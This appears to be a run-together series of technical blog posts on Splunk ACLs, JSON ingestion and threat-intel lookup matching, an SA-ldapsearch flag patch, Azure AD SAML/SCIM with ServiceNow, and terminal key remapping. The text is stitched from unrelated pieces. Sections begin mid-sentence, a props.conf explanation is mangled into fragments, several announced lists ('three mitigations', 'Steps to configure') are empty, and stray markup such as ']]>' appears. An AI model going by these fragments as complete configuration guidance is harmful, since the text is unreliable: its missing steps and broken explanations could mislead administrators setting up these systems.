[]
access = read : [ roleA ], write : [ ]

[lookups/lookupB.csv]
access = read : [ roleA, roleB ], write : [ ]
Or like this:
[]
access = read : [ roleA ], write : [ ]

[lookups]
access = read : [ roleA, roleB ], write : [ ]
None of the above configs will grant roleB read access to lookupB.csv. For the rest of this discussion, we assume that roleB should have access to lookupB.csv only.
# Interaction of ACLs across app-level, category-level, and specific object configuration

- To access/use an object, users must have read access to:
  - the app containing the object
  - the generic category within the app (for example, [views])
  - the object itself
- If any layer does not permit read access, the object will not be accessible.
For brevity, this article only discusses read access, whose ACL interaction differs slightly from write access. Don’t worry: once you understand read access, write access is much easier to understand.
Notice that a role must at least have read access to the app. The simplest way to grant roleB read access is:
[]
access = read : [ roleA, roleB ], write : [ ]
While the above config is effective, it does not meet the access requirement: roleB is granted read access to every object in that app.
roleB can be restricted as such:
[]
access = read : [ roleA, roleB ], write : [ ]

[lookups/lookupA.csv]
access = read : [ roleA ], write : [ ]

[lookups/lookupB.csv]
access = read : [ roleA, roleB ], write : [ ]

[lookups/lookupC.csv]
access = read : [ roleA ], write : [ ]
It is effective and meets the requirement, but there is an issue: every new lookup/object will now need to specify access = read : [ roleA ], write : [ ] to restrict roleB’s access. This is similar to a default-allow firewall.
How do we implement a default-deny ACL? We can achieve it by separating into two apps: appA is accessible to roleA only, while appB is accessible to both roleA and roleB. Any object we want to share between roleA and roleB goes into appB instead.
# appA
[]
access = read : [ roleA ], write : [ ]

# appB
[]
access = read : [ roleA, roleB ], write : [ ]
In this approach, every new object created in appA will not be accessible to roleB because roleB does not have access to the app.
I noticed that a lookup file with an object-level ACL, e.g.

[lookups/lookupC.csv]
access = read : [ roleA ], write : [ ]

is non-removable, even with the admin/sc-admin role.
My theory is that the object is made non-removable to prevent the ACL from being orphaned. But this theory does not hold, at least for a lookup file that is shipped with an app: deleting such a lookup file merely resets its content back to the app’s version. Deleting a lookup file is in fact necessary during an app update that ships updated content for a bundled lookup file. Even when a lookup was never modified, Splunk keeps its existing content during an app update; updating an app does not automatically update the bundled lookup, and the lookup will only be updated after a delete operation.
A similar limitation (i.e. an app update does not update the app’s objects) also applies to dashboards. However, there is no way to delete a dashboard XML in Splunk Cloud, so updating a dashboard through an app update always requires uninstalling the app beforehand.
[ACCOUNTDISABLE, NORMAL_ACCOUNT] instead. However, I noticed the LOCKOUT and PASSWORD_EXPIRED flags are not shown even though I was sure the accounts I queried had either of those flags set. Those flags are indeed listed in the documentation for “userAccountControl”: Windows Server and Active Directory Schema. Despite being mentioned in the documentation, the Windows Server doc has a note saying those flags have been moved to the “msDS-User-Account-Control-Computed“ attribute since Windows Server 2003. But when I queried that attribute, I got a decimal value, which meant the parsing function was not applied.
To apply the flag-parsing function on “msDS-User-Account-Control-Computed”:
'1.2.840.113556.1.4.8': format_user_flag_enum,     # User-Account-Control
'1.2.840.113556.1.4.1460': format_user_flag_enum,  # ms-DS-User-Account-Control-Computed
The first line is an existing one; the second line is the new one.
For the sake of completeness, that function can also be patched to parse the other flags of “msDS-User-Account-Control-Computed”. I created a script to apply the following patch directly on “splunk-supporting-add-on-for-active-directory_*.tgz“ and save the result to a new app package “SA-ldapsearch_*.tgz”.
--- SA-ldapsearch/bin/packages/app/formatting_extensions.py	2023-09-06 00:00:00.000000000 +0000
+++ SA-ldapsearch/bin/packages/app/formatting_extensions.py	2023-09-06 00:00:00.000000001 +0000
@@ -721,6 +721,12 @@
         names.append('PASSWORD_EXPIRED')
     if flags & 0x1000000:
         names.append('TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION')
+    if flags & 0x2000000:
+        names.append('NO_AUTH_DATA_REQUIRED')
+    if flags & 0x4000000:
+        names.append('PARTIAL_SECRETS_ACCOUNT')
+    if flags & 0x8000000:
+        names.append('USE_AES_KEYS')

     # Zero or one of these flags may be set
@@ -822,6 +828,7 @@
     '1.2.840.113556.1.4.1303': format_sid,              # Token-Groups-No-GC-Acceptable
     '1.2.840.113556.1.4.8': format_user_flag_enum,      # User-Account-Control
+    '1.2.840.113556.1.4.1460': format_user_flag_enum,   # ms-DS-User-Account-Control-Computed

     # formatter specially for msExchMailboxSecurityDescriptor
     '1.2.840.113556.1.4.7000.102.80' : format_security_descriptor,  # msExchMailboxSecurityDescriptor
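If you prefer to apply the patch by hand instead of using a script, a rough sketch could look like the following (the patch file name and the assumption that the tarball unpacks into an SA-ldapsearch/ folder are mine, not from the add-on's documentation):

```bash
# unpack the add-on, apply the diff above, then repackage under the new name
tar -xzf splunk-supporting-add-on-for-active-directory_*.tgz   # assumed to unpack into SA-ldapsearch/
patch -p0 < formatting_extensions.patch                        # the diff above, saved to a file
tar -czf SA-ldapsearch_patched.tgz SA-ldapsearch
```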
In an enterprise environment, SSO provides convenience to the staff and several benefits to the enterprise. Three benefits to the enterprise:
SSO does not necessarily provide better security all the time. A threat actor can use a compromised account to access any SSO-enabled system the account already had access to, leading to a wider blast radius. There are three mitigations to reduce such risk:
Configuring a system to use Azure Active Directory (AAD) involves setting up SAML and optionally SCIM. SCIM is only used to provision users; SAML can supply the necessary information (email, name, phone, etc.) to the SSO-enabled system to create users on demand upon a user's first login and to update the user information in subsequent logins. In the ServiceNow SAML configuration, under the “User Provisioning” tab, on-demand user provisioning can be enabled by ticking “Auto Provisioning User” and “Update User Record Upon Each Login”.
During the initial SAML setup in ServiceNow, a successful test login (using an AAD account, in this case) is required before SSO can be activated. This will fail if the user does not exist in ServiceNow yet. To pass it, simply create a new ServiceNow user with the same email as the test AAD account. If you are confident the SAML settings are correct, the test login can be made optional. It is easier to use the “Automatically configure ServiceNow” option because it will also configure the transform mapping in ServiceNow, which enables it to map SAML attributes (emailaddress, name, etc.) to the respective columns of ServiceNow’s sys_user table.
In the SAML configuration, AAD uses the “user.userprincipalname” (UPN) attribute as the unique user identifier. UPN is usually equivalent to the email address, so the AAD guide recommends changing the user identifier to “email” in ServiceNow’s Multi-Provider SSO. However, UPN can differ from the email address, which will prevent affected users from accessing ServiceNow. UPN or email is also not immutable; a user may change their email to reflect a name change. This can result in duplicate users if “Auto Provisioning User” is enabled in ServiceNow.
Even though SCIM can avoid duplicates, users with a recently changed email may still face access issues for a while because AAD SCIM is not real-time: each sync can take up to 30 minutes, longer if the attribute is sourced from on-premise AD (which needs to be synced up to AAD using AD Connect, and then to ServiceNow using SCIM).
To avoid this issue, there are three choices of source attribute that are immutable; each of them is suitable as a unique user identifier in SAML. They do not map to existing ServiceNow sys_user columns, so you will need a new column and a new mapping in the transform map.
- user.objectid: for AAD-only environment.
- user.onpremisesimmutableid: refers to GUID. AAD uses this attribute as the primary key to identify an on-premise AD user.
- user.onpremisesecurityidentifier: refers to SID; may not necessarily be synced up to AAD.

With on-demand user provisioning, it is possible to use SAML without SCIM. However, since a user is only created after the initial SSO login, user lookup will be limited. For example, in ServiceNow, a support staff will not be able to fill in the “this incident affects user X” field if that user has never logged in to ServiceNow before. SCIM can provision all users found in an identity provider into a target system. It is also possible to provision based on conditions, such as to exclude generic or service accounts.
Prior to configuring SCIM in ServiceNow, it is essential to disable the SAML on-demand user provisioning options “Auto Provisioning User” and “Update User Record Upon Each Login”. This is to avoid SAML-sourced attributes from overwriting SCIM’s in the sys_user table, because the SAML mapping does not necessarily match SCIM’s.
In AAD SCIM, the default primary mapping is userPrincipalName → user_name, with user_name set as the primary key (Show advanced options → Edit attribute list for ServiceNow). A mapping is considered primary when it has “Match objects using this attribute“ enabled and has the lowest value in “Matching precedence”. “Match objects…” configures SCIM to use a mapping to check the existence of each user, i.e. provision a user in the target system if it does not exist. Multiple mappings can be used in a defined order, in case a source attribute is empty. At least one mapping must have “Match objects…” enabled.
user | employeeId (AAD) | mail (AAD) | employee_number (SNow) | email (SNow) |
---|---|---|---|---|
A | 123 | empty | 123 | empty |
B | empty | b@example.com | empty | b@example.com |
What if user B gets an employeeId later on? There is an (unconfirmed) possibility that it can result in a duplicate user B in the target system.
user | employeeId (AAD) | mail (AAD) | employee_number (SNow) | email (SNow) |
---|---|---|---|---|
A | 123 | empty | 123 | empty |
B | 456 | b@example.com | empty | b@example.com |
B (duplicate in SNow) | 456 | b@example.com | 456 | b@example.com |
This can be avoided by using a mandatory and immutable AAD attribute. Similar to the three options mentioned in the previous section, they are:
objectId
immutableId
onPremisesSecurityIdentifier
Steps to configure:
An interesting issue I encountered was ultimately caused by an AAD attribute that had a value of just a single space. I initially configured a SCIM mapping as follows: Coalesce([attributeA], [attributeB]) → u_column_z. Coalesce() returns the first non-empty value. I knew attributeB is never empty, yet somehow some users had a (blank) value in their u_column_z.
I fired up the Expression Builder in AAD SCIM and tried “Coalesce([attributeA], [attributeB])” on one of the affected users. It returned “Your expression is valid, but your expression evaluated to an empty string”. Tried “ToUpper([attributeA])”, same. Tried “IsNullorEmpty([attributeA])”, got “false”; it would have returned “true” if the attribute were null or empty. So attributeA is not empty. But what could it be?
Then I compared the attribute against a literal space:

IIF([attributeA]=" ", "space", "no space")

The expression returned “space”, so attributeA’s value is a single space character.
AAD SCIM trims any leading and trailing whitespace in the output, similar to the trim() JavaScript method.
Aside from the obvious fix of removing that space in AAD, a workaround like “Coalesce(Trim([attributeA]), [attributeB])” works too.
Ctrl+a (line start) and Ctrl+e (line end). Interested to learn more tricks, I went searching for a cheatsheet and found this. I then added two missing shortcuts (Ctrl+h & Ctrl+d), printed it out and stuck it to my desk.

However, there were two shortcuts which did not work as intended: Ctrl+h and Ctrl+Backspace. The first one is supposed to be equivalent to Backspace, but it was deleting the previous word just like Ctrl+Backspace or Ctrl+w. The second one did not work in PowerShell’s Emacs mode.
While looking for a workaround for other terminals and shells, I found it helpful to remember these two facts so that you can stay on the right track.
In Kitty, $TERM is “xterm-kitty”; most other Linux terminals output it as “xterm-256color”. The value actually refers to the “terminfo“ being used, not the terminal emulator.
When Ctrl+Backspace is pressed, a terminal emulator sends either the “^?” or “^H” control character to the shell, which then initiates an action (e.g. “backward-kill-word”).
“^[character]“ is first and foremost a caret notation of a control character, a friendlier representation of hexadecimal, much like hexadecimal is a nicer representation of binary. “^H” actually means control code 8 (H is the eighth letter) rather than representing Ctrl+h. “^H” can be entered using Ctrl+h simply because that is more practical than having a dedicated key for each control character on a keyboard.
Most terminal emulators map Backspace to “^?” and Ctrl+Backspace to “^H”. Since Ctrl+h is also mapped to “^H”, it shares the same action (“backward-kill-word”) with Ctrl+Backspace. The easiest fix is to remap Ctrl+h to “^?”; this approach only requires configuring the terminal emulator.
To check which control character a key is mapped to:

$ showkey -a
# backspace
^?      127 0177 0x7f
# ctrl+backspace
^H        8 0010 0x08
map ctrl+h send_text normal \x7f
Add the above line to the end of “$HOME/.config/kitty/kitty.conf”. “7f” is the hex of “^?”.
Press Ctrl+Shift+F5 to reload the config and run showkey -a to verify Ctrl+h has been remapped.
$ showkey -a
# ctrl+h
^?      127 0177 0x7f
Go to Settings → Open JSON file, which will open “$home\AppData\Local\Packages\Microsoft.WindowsTerminal_xxx\LocalState\settings.json”. Under the "actions" list, append the following object.
{ "command": { "action": "sendInput", "input": "\u007F" }, "keys": "ctrl+h"}
Ctrl+Backspace does not work as expected when I switch PowerShell’s edit mode to Emacs (Set-PSReadLineOption -EditMode Emacs), even though it works in the default Cmd mode. This is because PowerShell binds it to BackwardDeleteChar in Emacs mode. Somehow I could not remap it to “^H” (\b).
Some xterm users also have this issue, and a workaround is to map it to an unused escape sequence and then bind that to backward-kill-word in the shell. While Windows Terminal supports sending an escape sequence, the corresponding binding is not supported in PowerShell. Instead of using an escape sequence, let’s use a Unicode character, specifically one within the private use area (U+E000-U+F8FF) to avoid conflicts with existing characters. I chose U+E888 for this example.
Anyhow, it is only a tiny issue for me since I can always use Ctrl+w.
Go to Settings → Open JSON file, which will open “$home\AppData\Local\Packages\Microsoft.WindowsTerminal_xxx\LocalState\settings.json”. Under the "actions" list, append the following object.
{ "command": { "action": "sendInput", "input": "\uE888" }, "keys": "ctrl+backspace"}
Set-PSReadLineKeyHandler -Chord "`u{E888}" -Function BackwardKillWord
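To make the binding persist across sessions, it can be appended to the PowerShell profile; a sketch (the profile path is whatever $PROFILE resolves to on your machine):

```powershell
# append the key handler to the current user's profile so new sessions pick it up
Add-Content -Path $PROFILE -Value 'Set-PSReadLineKeyHandler -Chord "`u{E888}" -Function BackwardKillWord'
```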
The following Windows Terminal + PowerShell configs did not work for me. Windows Terminal did yield the correct control character, but somehow PowerShell could not recognise it.
{ "command": { "action": "sendInput", "input": "\u007F" }, "keys": "backspace"},{ "command": { "action": "sendInput", "input": "\b" }, "keys": "ctrl+backspace"}
Set-PSReadLineKeyHandler -Chord "`u{007F}" -Function BackwardDeleteChar
Set-PSReadLineKeyHandler -Chord "`b" -Function BackwardKillWord
# zsh
bindkey '\uE888' backward-kill-word

# bash
bind '"\uE888":backward-kill-word'
]]>{ "datetime": 1672531212123456, "event_id": 1, "key1": "value1", "key2": "value2", "key3": "value3" }{ "datetime": 1672531213789012, "event_id": 2, "key1": "value1", "key2": "value2", "key3": "value3" }{ "datetime": 1672531214345678, "event_id": 3, "key1": "value1", "key2": "value2", "key3": "value3" }
The format can be achieved by exporting live events in JSON and appending them to a log file. However, I encountered a situation where the log file can only be generated in batch. Exporting the equivalent of the previous “example.log” in JSON without string manipulation looks like this:
[{"datetime": 1672531212123456, "event_id": 1, "key1": "value1", "key2": "value2", "key3": "value3"}, {"datetime": 1672531213789012, "event_id": 2, "key1": "value1", "key2": "value2", "key3": "value3"}, {"datetime": 1672531214345678, "event_id": 3, "key1": "value1", "key2": "value2", "key3": "value3"}]
I will detail the required configurations in this post, so that Splunk is able to parse it correctly even though “example.json” is not a valid JSON file.
[monitor:///var/log/app_a]
disabled = 0
index = index_name
sourcetype = app_a_event
The monitor directive is made up of two parts: monitor:// and the path, e.g. /var/log/app_a. Unlike most Splunk configs, this directive doesn't require the backslash (used in Windows paths) to be escaped, e.g. monitor://C:\foo\bar.
A path can be a file or a folder. When (*) wildcard matching is used to match multiple folders, another wildcard needs to be specified to match files in those matched folders; the wildcard works for a single path segment only. For example, to match all the files in the tree below, use monitor:///var/log/app_*/* (a stanza sketch follows the tree). Splunk also supports “…” for recursive matching.
/var/log/
├── app_a
│   ├── 1.log
│   ├── 2.log
│   └── 3.log
├── app_b
│   ├── 1.log
│   ├── 2.log
│   └── 3.log
└── app_c
    ├── 1.log
    ├── 2.log
    └── 3.log
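As a sketch, a single wildcard stanza covering all three folders could look like the one below. The index and sourcetype values are simply reused from the earlier stanza for illustration; in practice a more generic sourcetype would likely fit better, since the match is no longer limited to app_a.

```
[monitor:///var/log/app_*/*]
disabled = 0
index = index_name
sourcetype = app_a_event
```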
Specify an appropriate value in the sourcetype config; it will be the value of the sourcetype field in the events ingested under that monitor directive. Take note of the value you have configured, as it will be used in the rest of the configurations.
[app_a_event]
description = App A logs
INDEXED_EXTRACTIONS = JSON
# separate each object into a line
LINE_BREAKER = }(,){\"datetime\"
# a line represents an event
SHOULD_LINEMERGE = 0
TIMESTAMP_FIELDS = datetime
TIME_FORMAT = %s
## default is 2000
# MAX_DAYS_AGO = 3560
The stanza name should be the sourcetype value specified in inputs.conf. The following configs apply to the universal forwarder because INDEXED_EXTRACTIONS is used.
}(,){\"datetime\"
searches for },{"datetime"
and replaces “,” with “\n”.datetime
key in the example.json
.%s%3N
when there is subsecond.The location of “props.conf” depends on whether the universal forwarder is centrally managed by a deployment server.
Path A: $SPLUNK_HOME/etc/deployment-apps/foo/local/props.conf
Path B: $SPLUNK_HOME/etc/apps/foo/local/props.conf
If there is a deployment server, the config file should be placed in path A, from which the server will automatically deploy it to path B on the UF. If the UF is not centrally managed, it goes straight to path B.
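If you go through the deployment server, it may need to re-read its configuration before the change reaches the UF; a sketch, assuming a default Splunk install path:

```bash
$SPLUNK_HOME/bin/splunk reload deploy-server
```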
[app_a_event]
description = App A logs
KV_MODE = none
AUTO_KV_JSON = 0
SHOULD_LINEMERGE = 0
Since index-time field extraction is already enabled using INDEXED_EXTRACTIONS, search-time field extraction is no longer necessary. If KV_MODE and AUTO_KV_JSON are not disabled, there will be duplicate fields in the search result.
In Splunk Enterprise, the above file can be saved in a custom app, e.g. “$SPLUNK_HOME/etc/apps/custom-app/default/props.conf”.
For Splunk Cloud deployment, the above configuration can be added through a custom app or Splunk Web: Settings > Source types.
It is important to note that SEDCMD runs after INDEXED_EXTRACTIONS. I noticed this behaviour when I tried to ingest the API response of LibreNMS.
{"status": "ok", "devices": [{"device_id": 1, "key1": "value1", "key2": "value2"}, {"device_id": 2, "key1": "value1", "key2": "value2"}, {"device_id": 3, "key1": "value1", "key2": "value2"}], "count": 3}
In this scenario, I only wanted to ingest the “devices” array, where each item is an event. The previous approach not only did not split the array, but the “status” and “count” fields still existed in each event despite the use of SEDCMD to remove them.
The solution is not to use INDEXED_EXTRACTIONS (index-time field extraction), but to use KV_MODE (search-time field extraction) instead. INDEXED_EXTRACTIONS is left disabled so that SEDCMD works more reliably: if it is enabled, the JSON parser can unpredictably split part of the prefix (in this case {"status": "ok", "devices": [) or suffix into separate events, and SEDCMD does not work across events. SEDCMD does work with INDEXED_EXTRACTIONS, but you have to make sure the replacement is within an event.
# heavy forwarder or indexer
[api_a_response]
description = API A response
# remove bracket at the start and end of each line
SEDCMD-remove_prefix = s/^\{"status": "ok", "devices": \[//g
SEDCMD-remove_suffix = s/\], "count": [0-9]+\}$//g
# separate each object into a line
LINE_BREAKER = }(, ){\"device_id\"
# if each line/event is very long
# TRUNCATE = 0
# a line represents an event
SHOULD_LINEMERGE = 0
# search head
[api_a_response]
description = API A response
KV_MODE = json
AUTO_KV_JSON = 1
These CSV files can be used as lookups to find potentially malicious traffic. They contain a list of bad IPs/domains/URLs and we are going to look for those values in the events.
We can view the content of a lookup file by using inputlookup. When using that command, there should always be a leading pipe character “|” because it is an event-generating command.
A lookup file can be uploaded via Splunk Web or created directly in the following locations:
$SPLUNK_HOME/etc/users/<username>/<app_name>/lookups/
$SPLUNK_HOME/etc/apps/<app_name>/lookups/
$SPLUNK_HOME/etc/system/lookups/
In Splunk Web, setting the permission to app-sharing or global-sharing will automatically move the file to the second or third location respectively. An uploaded lookup file can be used straight away without having to reload the app or restart Splunk, regardless of how it was created.
| inputlookup botnet_ip.csv
The _time field is omitted for brevity.
first_seen_utc | dst_ip | dst_port | c2_status | last_online | malware | updated |
---|---|---|---|---|---|---|
2021-05-16 19:49:33 | 1.2.3.4 | 1234 | online | 2023-03-05 | Lorem | 2023-03-04T16:41:17Z |
The output is no different from any other event; we can specify which fields to display and then rename the fields.
| inputlookup botnet_ip.csv | fields dst_ip | rename dst_ip AS dst
dst |
---|
178.128.23.9 |
Example firewall events:
index=firewall
src | src_port | dst | action |
---|---|---|---|
192.168.1.5 | 45454 | 1.2.3.4 | allowed |
192.168.1.3 | 45452 | 7.6.5.4 | allowed |
192.168.1.4 | 45457 | 4.3.2.1 | allowed |
192.168.1.6 | 45451 | 7.7.5.5 | allowed |
Notice the first row’s dst value matches the dst_ip value of the example lookup table shown in the previous section.
To match the dst value of the firewall events against the dst_ip value of the lookup file, use a subsearch with inputlookup. In this example, the subsearch extracts only the dst_ip field and renames it to dst in order to match the same field in the firewall events.
index=firewall [| inputlookup botnet_ip.csv | fields dst_ip | rename dst_ip AS dst]
src | src_port | dst | action |
---|---|---|---|
192.168.1.5 | 45454 | 1.2.3.4 | allowed |
To display the results in table format, append | table * to the search, as sketched below.
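For instance, combining the earlier search with table (a sketch; the index and lookup file names are the ones used above):

```
index=firewall [| inputlookup botnet_ip.csv | fields dst_ip | rename dst_ip AS dst]
| table *
```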
The asterisk character (*) in a lookup file does work as a wildcard.
index=proxy
src | url | dst_port |
---|---|---|
192.168.1.5 | foo.com/path1 | 443 |
192.168.1.3 | foo.com/path2 | 443 |
192.168.1.4 | bar.com/path3 | 443 |
The lookup files do not include a wildcard affix.
| inputlookup urlhaus-filter-splunk-online.csv
host | path | message | updated |
---|---|---|---|
foo.com | | urlhaus-filter malicious website detected | 2023-03-13T00:11:20Z |
The add-on includes the geturlhausfilter command, along with other commands, to update their respective lookup files. Those commands have a wildcard_suffix argument to append a wildcard to the field’s values.
| geturlhausfilter wildcard_suffix=host
| outputlookup override_if_empty=false urlhaus-filter-splunk-online.csv
host | path | message | updated | host_wildcard_suffix |
---|---|---|---|---|
foo.com | | urlhaus-filter malicious website detected | 2023-03-13T00:11:20Z | foo.com* |
index=proxy [| inputlookup urlhaus-filter-splunk-online.csv | fields host_wildcard_suffix | rename host_wildcard_suffix AS url ]
src | url | dst_port |
---|---|---|
192.168.1.5 | foo.com/path1 | 443 |
192.168.1.3 | foo.com/path2 | 443 |
The previous section showed an example using a wildcard suffix (“foo.com*“). A wildcard also works as a prefix (“*foo.com”) or even in the middle (“f*o.com”), though these are discouraged.
index=proxy
src | domain | dst_port |
---|---|---|
192.168.1.5 | foo.com | 443 |
192.168.1.3 | lorem.foo.com | 443 |
192.168.1.4 | bar.com | 443 |
| geturlhausfilter wildcard_prefix=host
| outputlookup override_if_empty=false urlhaus-filter-splunk-online.csv
host | path | message | updated | host_wildcard_prefix |
---|---|---|---|---|
foo.com | | urlhaus-filter malicious website detected | 2023-03-13T00:11:20Z | *foo.com |
index=proxy [| inputlookup urlhaus-filter-splunk-online.csv | fields host_wildcard_prefix | rename host_wildcard_prefix AS domain ]
src | domain | dst_port |
---|---|---|
192.168.1.5 | foo.com | 443 |
192.168.1.3 | lorem.foo.com | 443 |
File hosting services like Google Docs and Dropbox are commonly abused to host phishing websites. For those sites, the lookup should match both domain and path. When specifying more than one field in the fields command, all fields will be matched using an AND condition.
index=proxy
src | domain | path |
---|---|---|
192.168.1.5 | foo.com | document1.html |
192.168.1.3 | foo.com | document2.html |
192.168.1.4 | foo.com | document3.html |
| inputlookup urlhaus-filter-splunk-online.csv
host | path | message | updated |
---|---|---|---|
foo.com | document1.html | urlhaus-filter malicious website detected | 2023-03-13T00:11:20Z |
index=proxy [| inputlookup urlhaus-filter-splunk-online.csv | fields host, path | rename host AS domain ]
src | domain | path |
---|---|---|
192.168.1.5 | foo.com | document1.html |
A lookup file may have rows with an empty path to denote that a domain should be blocked regardless of path, while also having rows with both domain and path to denote that a specific URL should be blocked instead. The syntax is the same as what was shown in the previous section because Splunk will only match non-empty values; empty values are ignored.
index=proxy
src | domain | path |
---|---|---|
192.168.1.5 | bad-domain.com | lorem-ipsum.html |
192.168.1.3 | bad-domain.com | foo-bar.html |
192.168.1.4 | docs.google.com | malware.exe |
192.168.1.4 | docs.google.com | safe.doc |
| inputlookup urlhaus-filter-splunk-online.csv
host | path | message | updated |
---|---|---|---|
bad-domain.com | | urlhaus-filter malicious website detected | 2023-03-13T00:11:20Z |
docs.google.com | malware.exe | urlhaus-filter malicious website detected | 2023-03-13T00:11:20Z |
index=proxy [| inputlookup urlhaus-filter-splunk-online.csv | fields host, path | rename host AS domain ]
src | domain | path |
---|---|---|
192.168.1.5 | bad-domain.com | lorem-ipsum.html |
192.168.1.3 | bad-domain.com | foo-bar.html |
192.168.1.4 | docs.google.com | malware.exe |
Lookup file matching is case-insensitive. If case-sensitive matching is required, use lookup and a lookup definition.
index=proxy
src | domain |
---|---|
192.168.1.5 | loremipsum.com |
| inputlookup urlhaus-filter-splunk-online.csv
host | path | message | updated |
---|---|---|---|
lOrEmIpSuM.com | | urlhaus-filter malicious website detected | 2023-03-13T00:11:20Z |
docs.google.com | malware.exe | urlhaus-filter malicious website detected | 2023-03-13T00:11:20Z |
index=proxy [| inputlookup urlhaus-filter-splunk-online.csv | fields host, path | rename host AS domain ]
src | domain |
---|---|
192.168.1.5 | loremipsum.com |
Splunk automatically detects CIDR-like values in a lookup file and performs CIDR-matching accordingly. However, this behaviour is on a best-effort basis and may not work as intended. To explicitly use lookup fields for CIDR-matching, use lookup and a lookup definition.
index=firewall
src | src_port | dst | action |
---|---|---|---|
192.168.1.5 | 45454 | 187.190.252.167 | allowed |
192.168.1.3 | 45452 | 7.6.5.4 | allowed |
192.168.1.4 | 45457 | 4.3.2.1 | allowed |
192.168.1.6 | 45451 | 89.248.163.100 | allowed |
| inputlookup opendbl_ip.csv
start | end | netmask | cidr_range | name | updated |
---|---|---|---|---|---|
187.190.252.167 | 187.190.252.167 | 32 | 187.190.252.167/32 | Emerging Threats: Known Compromised Hosts | 2023-01-30T08:03:00Z |
89.248.163.0 | 89.248.163.255 | 24 | 89.248.163.0/24 | Dshield | 2023-01-30T08:01:00Z |
index=firewall [| inputlookup opendbl_ip.csv | fields cidr_range | rename cidr_range AS dst ]
src | src_port | dst | action |
---|---|---|---|
192.168.1.5 | 45454 | 187.190.252.167 | allowed |
192.168.1.6 | 45451 | 89.248.163.100 | allowed |
When used as a subsearch, inputlookup filters the event data and only outputs rows with matching values of the specified field(s). lookup enriches the event data by appending new fields to the rows with matching field values. Another way to understand the difference is that inputlookup performs an inner join while lookup performs a left outer join, where the event data is the left table and the lookup file is the right table.
Despite their difference, it can be useful to use both at the same time to enrich filtered event data, even when using the same lookup file.
| inputlookup botnet_ip.csv
The _time field is omitted for brevity.
first_seen_utc | dst_ip | dst_port | c2_status | last_online | malware | updated |
---|---|---|---|---|---|---|
2021-05-16 19:49:33 | 1.2.3.4 | 1234 | online | 2023-03-05 | Lorem | 2023-03-04T16:41:17Z |
2021-05-16 19:49:33 | 4.3.2.1 | 1234 | online | 2023-03-05 | Ipsum | 2023-03-04T16:41:17Z |
index=firewall
src | src_port | dst | action |
---|---|---|---|
192.168.1.5 | 45454 | 1.2.3.4 | allowed |
192.168.1.3 | 45452 | 7.6.5.4 | allowed |
192.168.1.4 | 45457 | 4.3.2.1 | allowed |
192.168.1.6 | 45451 | 7.7.5.5 | allowed |
index=firewall [| inputlookup botnet_ip.csv | fields dst_ip | rename dst_ip AS dst]
src | src_port | dst | action |
---|---|---|---|
192.168.1.5 | 45454 | 1.2.3.4 | allowed |
192.168.1.3 | 45452 | 7.6.5.4 | allowed |
192.168.1.4 | 45457 | 4.3.2.1 | allowed |
192.168.1.6 | 45451 | 7.7.5.5 | allowed |
index=firewall [| inputlookup botnet_ip.csv | fields dst_ip | rename dst_ip AS dst]
| lookup botnet_ip.csv dst_ip AS dst OUTPUT c2_status, malware
src | src_port | dst | action | c2_status | malware |
---|---|---|---|---|---|
192.168.1.5 | 45454 | 1.2.3.4 | allowed | online | Lorem |
192.168.1.4 | 45457 | 4.3.2.1 | allowed | online | Ipsum |
It is also possible to rename lookup destination fields.
index=firewall [| inputlookup botnet_ip.csv | fields dst_ip | rename dst_ip AS dst]
| lookup botnet_ip.csv dst_ip AS dst OUTPUT c2_status AS "C2 Server Status", malware AS "Malware Family"
src | src_port | dst | action | C2 Server Status | Malware Family |
---|---|---|---|---|---|
192.168.1.5 | 45454 | 1.2.3.4 | allowed | online | Lorem |
192.168.1.4 | 45457 | 4.3.2.1 | allowed | online | Ipsum |
Lookup definition provides matching rules for a lookup file. It can be configured for case-sensitivity, wildcard, CIDR-matching and others through transforms.conf. It can also be configured via Splunk Web: Settings → Lookups → Lookup definitions.
A bare minimum lookup definition is as such:
[lookup-definition-name]
filename = lookup-filename.csv
transforms.conf can be saved in the following directories in order of priority (highest to lowest):
$SPLUNK_HOME/etc/users/<username>/<app_name>/local/
$SPLUNK_HOME/etc/apps/<app_name>/local/
$SPLUNK_HOME/etc/system/local/
My naming convention for a lookup definition is simply removing the .csv extension, e.g. “example.csv” (lookup file), “example” (lookup definition). While it is possible to name a lookup definition with the file extension (“example.csv”), I discourage it to avoid confusion.
It is imperative to note that a lookup definition only applies to the lookup search command and does not apply to inputlookup. Although inputlookup accepts a lookup definition as its lookup table (in addition to a lookup file), the definition’s matching rules will be ignored.
[urlhaus-filter-splunk-online]
filename = urlhaus-filter-splunk-online.csv
# applies to all fields
case_sensitive_match = 1
index=proxy
src | domain | path |
---|---|---|
192.168.1.5 | bad-domain.com | lorem-ipsum.html |
192.168.1.3 | bad-domain.com | lOrEm-iPsUm.hTmL |
| inputlookup urlhaus-filter-splunk-online
host | path | message | updated |
---|---|---|---|
bad-domain.com | lorem-ipsum.html | urlhaus-filter malicious website detected | 2023-03-13T00:11:20Z |
index=proxy
| lookup urlhaus-filter-splunk-online host AS domain, path OUTPUT message
src | domain | path | message |
---|---|---|---|
192.168.1.5 | bad-domain.com | lorem-ipsum.html | urlhaus-filter malicious website detected |
192.168.1.3 | bad-domain.com | lOrEm-iPsUm.hTmL | |
[urlhaus-filter-splunk-online]
filename = urlhaus-filter-splunk-online.csv
match_type = WILDCARD(host_wildcard_suffix)
index=proxy
src | url | dst_port |
---|---|---|
192.168.1.5 | foo.com/path1 | 443 |
192.168.1.3 | foo.com/path2 | 443 |
192.168.1.4 | bar.com/path3 | 443 |
The lookup files do not include a wildcard affix.
| inputlookup urlhaus-filter-splunk-online
host | path | message | updated | host_wildcard_suffix |
---|---|---|---|---|
foo.com | | urlhaus-filter malicious website detected | 2023-03-13T00:11:20Z | foo.com* |
index=proxy
| lookup urlhaus-filter-splunk-online host_wildcard_suffix AS url OUTPUT message
src | url | dst_port | message |
---|---|---|---|
192.168.1.5 | foo.com/path1 | 443 | urlhaus-filter malicious website detected |
192.168.1.3 | foo.com/path2 | 443 | urlhaus-filter malicious website detected |
[opendbl_ip]
filename = opendbl_ip.csv
match_type = CIDR(cidr_range)
index=firewall
src | src_port | dst | action |
---|---|---|---|
192.168.1.5 | 45454 | 187.190.252.167 | allowed |
192.168.1.3 | 45452 | 7.6.5.4 | allowed |
192.168.1.4 | 45457 | 4.3.2.1 | allowed |
192.168.1.6 | 45451 | 89.248.163.100 | allowed |
| inputlookup opendbl_ip
start | end | netmask | cidr_range | name | updated |
---|---|---|---|---|---|
